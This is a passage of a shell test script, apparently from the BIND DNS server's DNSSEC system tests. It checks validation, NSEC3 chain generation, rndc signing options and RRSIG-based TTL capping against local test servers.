@10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive validation OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking negative validation ($n)" +ret=0 +dig_with_opts +noauth q.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth q.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that root DS queries validate ($n)" +ret=0 +dig_with_opts +noauth . @10.53.0.1 ds > dig.out.ns1.test$n || ret=1 +dig_with_opts +noauth . @10.53.0.4 ds > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns1.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that DS at a RFC 1918 empty zone lookup succeeds ($n)" +ret=0 +dig_with_opts +noauth 10.in-addr.arpa ds @10.53.0.2 >dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth 10.in-addr.arpa ds @10.53.0.4 >dig.out.ns6.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns6.test$n || ret=1 +grep "status: NOERROR" dig.out.ns6.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking expired signatures remain with "'"allow-update { none; };"'" and no keys available ($n)" +ret=0 +dig_with_opts +noauth expired.example. +dnssec @10.53.0.3 soa > dig.out.ns3.test$n || ret=1 +grep "RRSIG.SOA" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" + +status=$((status+ret)) +echo_i "checking expired signatures do not validate ($n)" +ret=0 +dig_with_opts +noauth expired.example. +dnssec @10.53.0.4 soa > dig.out.ns4.test$n || ret=1 +grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +grep "expired.example/.*: RRSIG has expired" ns4/named.run > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that the NSEC3 record for the apex is properly signed when a DNSKEY is added via UPDATE ($n)" +ret=0 +( +cd ns3 || exit 1 +kskname=$($KEYGEN -q -3 -a $DEFAULT_ALGORITHM -fk update-nsec3.example) +( +echo zone update-nsec3.example +echo server 10.53.0.3 "$PORT" +grep DNSKEY "${kskname}.key" | sed -e 's/^/update add /' -e 's/IN/300 IN/' +echo send +) | $NSUPDATE +) +dig_with_opts +dnssec a update-nsec3.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1 +grep "NSEC3 .* TYPE65534" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that the NSEC record is properly generated when DNSKEY are added via auto-dnssec ($n)" +ret=0 +dig_with_opts +dnssec a auto-nsec.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1 +grep "IN.NSEC[^3].* DNSKEY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that the NSEC3 record is properly generated when DNSKEY are added via auto-dnssec ($n)" +ret=0 +dig_with_opts +dnssec a auto-nsec3.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1 +grep "IN.NSEC3 .* DNSKEY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that signing records have been marked as complete ($n)" +ret=0 +checkprivate dynamic.example 10.53.0.3 || ret=1 +checkprivate update-nsec3.example 10.53.0.3 || ret=1 +checkprivate auto-nsec3.example 10.53.0.3 || ret=1 +checkprivate expiring.example 10.53.0.3 || ret=1 +checkprivate auto-nsec.example 10.53.0.3 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing' without arguments is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -list' without zone is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing -list > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -clear' without additional arguments is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing -clear > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -clear all' without zone is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing -clear all > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param' without additional arguments is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing -nsec3param > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param none' without zone is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing -nsec3param none > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param 1' without additional arguments is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing -nsec3param 1 > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param 1 0' without additional arguments is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing -nsec3param 1 0 > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param 1 0 0' without additional arguments is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing -nsec3param 1 0 0 > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param 1 0 0 -' without zone is handled ($n)" +ret=0 +rndccmd 10.53.0.3 signing -nsec3param 1 0 0 - > /dev/null 2>&1 && ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param' works with salt ($n)" +ret=0 +rndccmd 10.53.0.3 signing -nsec3param 1 0 0 ffff inline.example > /dev/null 2>&1 || ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 10 ; do + salt=$(dig_with_opts +nodnssec +short nsec3param inline.example. @10.53.0.3 | awk '{print $4}') + if [ "$salt" = "FFFF" ]; then + break; + fi + echo_i "sleeping ...." + sleep 1 +done; +[ "$salt" = "FFFF" ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param' works without salt ($n)" +ret=0 +rndccmd 10.53.0.3 signing -nsec3param 1 0 0 - inline.example > /dev/null 2>&1 || ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 10 ; do + salt=$(dig_with_opts +nodnssec +short nsec3param inline.example. @10.53.0.3 | awk '{print $4}') + if [ "$salt" = "-" ]; then + break; + fi + echo_i "sleeping ...." + sleep 1 +done; +[ "$salt" = "-" ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param' works with 'auto' as salt ($n)" +ret=0 +rndccmd 10.53.0.3 signing -nsec3param 1 0 0 auto inline.example > /dev/null 2>&1 || ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 10 ; do + salt=$(dig_with_opts +nodnssec +short nsec3param inline.example. @10.53.0.3 | awk '{print $4}') + [ -n "$salt" ] && [ "$salt" != "-" ] && break + echo_i "sleeping ...." + sleep 1 +done; +[ "$salt" != "-" ] || ret=1 +[ "${#salt}" -eq 16 ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'rndc signing -nsec3param' with 'auto' as salt again generates a different salt ($n)" +ret=0 +oldsalt=$salt +rndccmd 10.53.0.3 signing -nsec3param 1 0 0 auto inline.example > /dev/null 2>&1 || ret=1 +rndccmd 10.53.0.3 status > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 10 ; do + salt=$(dig_with_opts +nodnssec +short nsec3param inline.example. @10.53.0.3 | awk '{print $4}') + [ -n "$salt" ] && [ "$salt" != "$oldsalt" ] && break + echo_i "sleeping ...." + sleep 1 +done; +[ "$salt" != "$oldsalt" ] || ret=1 +[ "${#salt}" -eq 16 ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check rndc signing -list output ($n)" +ret=0 +{ rndccmd 10.53.0.3 signing -list dynamic.example > signing.out; } 2>&1 +grep -q "No signing records found" signing.out || { + ret=1 + sed 's/^/ns3 /' signing.out | cat_i +} +{ rndccmd 10.53.0.3 signing -list update-nsec3.example > signing.out; } 2>&1 +grep -q "Done signing with key .*/$DEFAULT_ALGORITHM" signing.out || { + ret=1 + sed 's/^/ns3 /' signing.out | cat_i +} +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "clear signing records ($n)" +{ rndccmd 10.53.0.3 signing -clear all update-nsec3.example > /dev/null; } 2>&1 || ret=1 +check_no_signing_record_found() { + { rndccmd 10.53.0.3 signing -list update-nsec3.example > signing.out; } 2>&1 + grep -q "No signing records found" signing.out || { + sed 's/^/ns3 /' signing.out | cat_i + return 1 + } + return 0 +} +retry_quiet 5 check_no_signing_record_found || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a insecure zone beneath a cname resolves ($n)" +ret=0 +dig_with_opts soa insecure.below-cname.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a secure zone beneath a cname resolves ($n)" +ret=0 +dig_with_opts soa secure.below-cname.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +my_dig() { + "$DIG" +noadd +nosea +nostat +noquest +nocomm +nocmd -p "$PORT" @10.53.0.4 "$@" +} + +echo_i "checking DNSKEY query with no data still gets put in cache ($n)" +ret=0 +firstVal=$(my_dig insecure.example. dnskey| awk '$1 != ";;" { print $2 }') +sleep 1 +secondVal=$(my_dig insecure.example. dnskey| awk '$1 != ";;" { print $2 }') +if [ "${firstVal:-0}" -eq "${secondVal:-0}" ] +then + sleep 1 + thirdVal=$(my_dig insecure.example. dnskey|awk '$1 != ";;" { print $2 }') + if [ "${firstVal:-0}" -eq "${thirdVal:-0}" ] + then + echo_i "cannot confirm query answer still in cache" + ret=1 + fi +fi +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that a split dnssec dnssec-signzone work ($n)" +ret=0 +dig_with_opts soa split-dnssec.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that a smart split dnssec dnssec-signzone work ($n)" +ret=0 +dig_with_opts soa split-smart.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that NOTIFY is sent at the end of NSEC3 chain generation ($n)" +ret=0 +( +echo zone nsec3chain-test +echo server 10.53.0.2 "$PORT" +echo update add nsec3chain-test. 0 nsec3param 1 0 1 123456 +echo send +) | $NSUPDATE +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 +do + dig_with_opts nsec3param nsec3chain-test @10.53.0.2 > dig.out.ns2.test$n || ret=1 + if grep "ANSWER: 3," dig.out.ns2.test$n >/dev/null + then + break; + fi + echo_i "sleeping ...." + sleep 3 +done +grep "ANSWER: 3," dig.out.ns2.test$n > /dev/null || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "nsec3 chain generation not complete"; fi +dig_with_opts +noauth +nodnssec soa nsec3chain-test @10.53.0.2 > dig.out.ns2.test$n || ret=1 +s2=$(awk '$4 == "SOA" { print $7}' dig.out.ns2.test$n) +for i in 1 2 3 4 5 6 7 8 9 10 +do + dig_with_opts +noauth +nodnssec soa nsec3chain-test @10.53.0.3 > dig.out.ns3.test$n || ret=1 + s3=$(awk '$4 == "SOA" { print $7}' dig.out.ns3.test$n) + test "$s2" = "$s3" && break + sleep 1 +done +digcomp dig.out.ns2.test$n dig.out.ns3.test$n || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check dnssec-dsfromkey from stdin ($n)" +ret=0 +dig_with_opts dnskey algroll. @10.53.0.2 | \ + $DSFROMKEY -f - algroll. > dig.out.ns2.test$n || ret=1 +NF=$(awk '{print NF}' dig.out.ns2.test$n | sort -u) +[ "${NF}" = 7 ] || ret=1 +# make canonical +awk '{ + for (i=1;i<7;i++) printf("%s ", $i); + for (i=7;i<=NF;i++) printf("%s", $i); + printf("\n"); +}' < dig.out.ns2.test$n > canonical1.$n || ret=1 +awk '{ + for (i=1;i<7;i++) printf("%s ", $i); + for (i=7;i<=NF;i++) printf("%s", $i); + printf("\n"); +}' < ns1/dsset-algroll$TP > canonical2.$n || ret=1 +$DIFF -b canonical1.$n canonical2.$n > /dev/null 2>&1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Intentionally strip ".key" from keyfile name to ensure the error message +# includes it anyway to avoid confusion (RT #21731) +echo_i "check dnssec-dsfromkey error message when keyfile is not found ($n)" +ret=0 +key=$($KEYGEN -a $DEFAULT_ALGORITHM -q example.) || ret=1 +mv "$key.key" "$key" +$DSFROMKEY "$key" > dsfromkey.out.$n 2>&1 && ret=1 +grep "$key.key: file not found" dsfromkey.out.$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check dnssec-dsfromkey with revoked key ($n)" +ret=0 +dig_with_opts revkey.example dnskey @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "DNSKEY.256 3 13" dig.out.ns4.test$n > /dev/null || ret=1 # ZSK +grep "DNSKEY.385 3 13" dig.out.ns4.test$n > /dev/null || ret=1 # revoked KSK +grep "DNSKEY.257 3 13" dig.out.ns4.test$n > /dev/null || ret=1 # KSK +test $(awk '$4 == "DNSKEY" { print }' dig.out.ns4.test$n | wc -l) -eq 3 || ret=1 +$DSFROMKEY -f dig.out.ns4.test$n revkey.example. > dsfromkey.out.test$n || ret=1 +test $(wc -l < dsfromkey.out.test$n) -eq 1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" + +echo_i "testing soon-to-expire RRSIGs without a replacement private key ($n)" +ret=0 +dig_with_answeropts +nottlid expiring.example ns @10.53.0.3 | grep RRSIG > dig.out.ns3.test$n 2>&1 +# there must be a signature here +[ -s dig.out.ns3.test$n ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing new records are signed with 'no-resign' ($n)" +ret=0 +( +echo zone nosign.example +echo server 10.53.0.3 "$PORT" +echo update add new.nosign.example 300 in txt "hi there" +echo send +) | $NSUPDATE +sleep 1 +dig_with_answeropts +nottlid txt new.nosign.example @10.53.0.3 \ + > dig.out.ns3.test$n 2>&1 +grep RRSIG dig.out.ns3.test$n > /dev/null 2>&1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing expiring records aren't resigned with 'no-resign' ($n)" +ret=0 +dig_with_answeropts +nottlid nosign.example ns @10.53.0.3 | \ + grep RRSIG | sed 's/[ ][ ]*/ /g' > dig.out.ns3.test$n 2>&1 +# the NS RRSIG should not be changed +$DIFF nosign.before dig.out.ns3.test$n > /dev/null|| ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing updates fail with no private key ($n)" +ret=0 +rm -f ns3/Knosign.example.*.private +( +echo zone nosign.example +echo server 10.53.0.3 "$PORT" +echo update add fail.nosign.example 300 in txt "reject me" +echo send +) | $NSUPDATE > /dev/null 2>&1 && ret=1 +dig_with_answeropts +nottlid fail.nosign.example txt @10.53.0.3 \ + > dig.out.ns3.test$n 2>&1 +[ -s dig.out.ns3.test$n ] && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing legacy upper case signer name validation ($n)" +ret=0 +$DIG +tcp +noadd +noauth +dnssec -p "$PORT" soa upper.example @10.53.0.4 \ + > dig.out.ns4.test$n 2>&1 +grep "flags:.* ad;" dig.out.ns4.test$n > /dev/null || ret=1 +grep "RRSIG.*SOA.* UPPER\\.EXAMPLE\\. " dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing that we lower case signer name ($n)" +ret=0 +$DIG +tcp +noadd +noauth +dnssec -p "$PORT" soa LOWER.EXAMPLE @10.53.0.4 \ + > dig.out.ns4.test$n 2>&1 +grep "flags:.* ad;" dig.out.ns4.test$n > /dev/null || ret=1 +grep "RRSIG.*SOA.* lower\\.example\\. " dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing TTL is capped at RRSIG expiry time ($n)" +ret=0 +rndccmd 10.53.0.3 freeze expiring.example 2>&1 | sed 's/^/ns3 /' | cat_i +( +cd ns3 || exit 1 +for file in K*.moved; do + mv "$file" "$(basename "$file" .moved)" +done +$SIGNER -S -N increment -e now+1mi -o expiring.example expiring.example.db > /dev/null +) || ret=1 +rndc_reload ns3 10.53.0.3 expiring.example + +rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i +dig_with_answeropts +cd expiring.example soa @10.53.0.4 > dig.out.ns4.1.$n +dig_with_answeropts expiring.example soa @10.53.0.4 > dig.out.ns4.2.$n +ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n) +ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n) +for ttl in ${ttls:-0}; do + [ "${ttl}" -eq 300 ] || ret=1 +done +for ttl in ${ttls2:-0}; do + [ "${ttl}" -le 60 ] || ret=1 +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing TTL is capped at RRSIG expiry time for records in the additional section (NS) ($n)" +ret=0 +rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i +sleep 1 +dig_with_additionalopts +cd expiring.example ns @10.53.0.4 > dig.out.ns4.1.$n +dig_with_additionalopts expiring.example ns @10.53.0.4 > dig.out.ns4.2.$n +ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n) +ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n) +for ttl in ${ttls:-300}; do + [ "$ttl" -le 300 ] && [ "$ttl" -gt 240 ] || ret=1 +done +for ttl in ${ttls2:-0}; do + [ "$ttl" -le 60 ] || ret=1 +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing TTL is capped at RRSIG expiry time for records in the additional section (MX) ($n)" +ret=0 +rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i +sleep 1 +dig_with_additionalopts +cd expiring.example mx @10.53.0.4 > dig.out.ns4.1.$n +dig_with_additionalopts expiring.example mx @10.53.0.4 > dig.out.ns4.2.$n +ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n) +ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n) +for ttl in ${ttls:-300}; do + [ "$ttl" -le 300 ] && [ "$ttl" -gt 240 ] || ret=1 +done +for ttl in ${ttls2:-0}; do + [ "$ttl" -le 60 ] || ret=1 +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +copy_setports ns4/named3.conf.in ns4/named.conf +rndccmd 10.53.0.4 reconfig 2>&1 | sed 's/^/ns4 /' | cat_i +sleep 3 + +echo_i "testing TTL of about to expire RRsets with dnssec-accept-expired yes; ($n)" +ret=0 +rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i +dig_with_answeropts +cd expiring.example soa @10.53.0.4 > dig.out.ns4.1.$n +dig_with_answeropts expiring.example soa @10.53.0.4 > dig.out.ns4.2.$n +ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n) +ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n) +for ttl in ${ttls:-0}; do + [ "$ttl" -eq 300 ] || ret=1 +done +for ttl in ${ttls2:-0}; do + [ "$ttl" -eq 120 ] || ret=1 +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing TTL of expired RRsets with dnssec-accept-expired yes; ($n)" +ret=0 +dig_with_answeropts +cd expired.example soa @10.53.0.4 > dig.out.ns4.1.$n +dig_with_answeropts expired.example soa @10.53.0.4 > dig.out.ns4.2.$n +ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n) +ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n) +for ttl in ${ttls:-0}; do + [ "$ttl" -eq 300 ] || ret=1 +done +for ttl in ${ttls2:-0}; do + [ "$ttl" -eq 120 ] || ret=1 +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing TTL is capped at RRSIG expiry time for records in the additional section with dnssec-accept-expired yes; ($n)" +ret=0 +rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i +dig_with_additionalopts +cd expiring.example mx @10.53.0.4 > dig.out.ns4.1.$n +dig_with_additionalopts expiring.example mx @10.53.0.4 > dig.out.ns4.2.$n +ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n) +ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n) +for ttl in ${ttls:-300}; do + [ "$ttl" -le 300 ] && [ "$ttl" -gt 240 ] || ret=1 +done +for ttl in ${ttls2:-0}; do + [ "$ttl" -le 120 ] && [ "$ttl" -gt 60 ] || ret=1 +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing DNSKEY lookup via CNAME ($n)" +ret=0 +dig_with_opts +noauth cnameandkey.secure.example. \ + @10.53.0.3 dnskey > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth cnameandkey.secure.example. \ + @10.53.0.4 dnskey > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "CNAME" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing KEY lookup at CNAME (present) ($n)" +ret=0 +dig_with_opts +noauth cnameandkey.secure.example. \ + @10.53.0.3 key > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth cnameandkey.secure.example. \ + @10.53.0.4 key > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "CNAME" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing KEY lookup at CNAME (not present) ($n)" +ret=0 +dig_with_opts +noauth cnamenokey.secure.example. \ + @10.53.0.3 key > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth cnamenokey.secure.example. \ + @10.53.0.4 key > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "CNAME" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing DNSKEY lookup via DNAME ($n)" +ret=0 +dig_with_opts a.dnameandkey.secure.example. \ + @10.53.0.3 dnskey > dig.out.ns3.test$n || ret=1 +dig_with_opts a.dnameandkey.secure.example. \ + @10.53.0.4 dnskey > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "CNAME" dig.out.ns4.test$n > /dev/null || ret=1 +grep "DNAME" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "testing KEY lookup via DNAME ($n)" +ret=0 +dig_with_opts b.dnameandkey.secure.example. \ + @10.53.0.3 key > dig.out.ns3.test$n || ret=1 +dig_with_opts b.dnameandkey.secure.example. \ + @10.53.0.4 key > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "DNAME" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that named doesn't loop when all private keys are not available ($n)" +ret=0 +lines=$(grep -c "reading private key file expiring.example" ns3/named.run || true) +test "${lines:-1000}" -lt 15 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check against against missing nearest provable proof ($n)" +dig_with_opts +norec b.c.d.optout-tld. \ + @10.53.0.6 ds > dig.out.ds.ns6.test$n || ret=1 +nsec3=$(grep -c "IN.NSEC3" dig.out.ds.ns6.test$n || true) +[ "$nsec3" -eq 2 ] || ret=1 